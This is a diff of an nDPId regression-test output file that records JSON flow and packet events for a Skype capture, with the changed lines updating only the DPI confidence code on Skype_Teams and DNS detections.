00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1431970668514,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAux9AAEAGAGPAqAEib91Njsg7Abv27osgAAAAALAC\/\/8jHQAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":953,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -560,61 +560,61 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1431970668803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668803,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qSRAAEAGEmrAqAEib91Njsg7Abv27oshEKH0yoAQECzoZgAAAQEICj4yC49NkBYw"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1431970668973,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970668973,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1LlEAAEARAb\/AqAEinTfrpjLdnE8AIZ69e3cC3u8ghDSSA4Gtev71JCe8ggQmBcfTOg=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":979,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1431970668973,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970668973,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyB6AAAEARJ\/jAqAEi1cezkTLdnFgAHgsae3kCyqgAJfxhjLbJRJUrPtsodh20jg=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":980,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1431970668973,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970668973,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+wKIAAEAR1+DAqAEiQTffKjLdnFgAKi+se3sC0K9BEnPeD0WuBXXm5wareR+WL1\/qIQP+x9YGu9Sm5Q=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":980,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":980,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":988,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1431970669372,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970669372,"pkt":"0NQSxnP1PBXCt3IOCABFAABA35sAAEARF57AqAEiwKgBAfduADUALM6fTeoBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1431970669372,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970669372,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIWEAAEAR1djAqAEiwKgBAfsCADUALD+l2TUBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":992,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":992,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1431970669927,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970669927,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2E64AAEARG+XAqAEi1cezkjLdnF4AIuLme30CQ7dH2z2v6k8Do\/cqwHkYPEueogZ7yfU="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":993,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":993,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1431970669927,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970669927,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9jJkAAEARWu7AqAEinTg0JjLdnE8AKRAHe38C0EXr0Mxbt14LCxM+eOaK\/XZWtSRnQDNWL9r8hWuf"} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":993,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":993,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1431970670304,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970670304,"pkt":"0NQSxnP1PBXCt3IOCABFAABL\/QYAAEAR+ifAqAEiwKgBAe6nADUAN3lCuqsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} -00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1002,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1431970670304,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970670304,"pkt":"0NQSxnP1PBXCt3IOCABFAABLI7cAAEAR03fAqAEiwKgBAdo6ADUAN4ffpXsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1002,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1002,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1431970670460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970670460,"pkt":"0NQSxnP1PBXCt3IOCABFAABAdiAAAEARgRnAqAEiwKgBAfduADUALM6fTeoBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1431970670460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970670460,"pkt":"0NQSxnP1PBXCt3IOCABFAABAmMcAAEARXnLAqAEiwKgBAfsCADUALD+l2TUBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1015,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1431970670941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970670941,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyyNoAAEARNhPAqAEib91KJjLdnE8AHkdoe4ECIl4YB+sv8264lsMD2bF6lk0ImA=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1015,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1015,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1431970670941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970670941,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyjX8AAEARWhHAqAEinTg0KDLdnFEAHlwwe4MCZJjbDEMF5Jp3fN4mrZ11ZfLW0g=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970670941,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 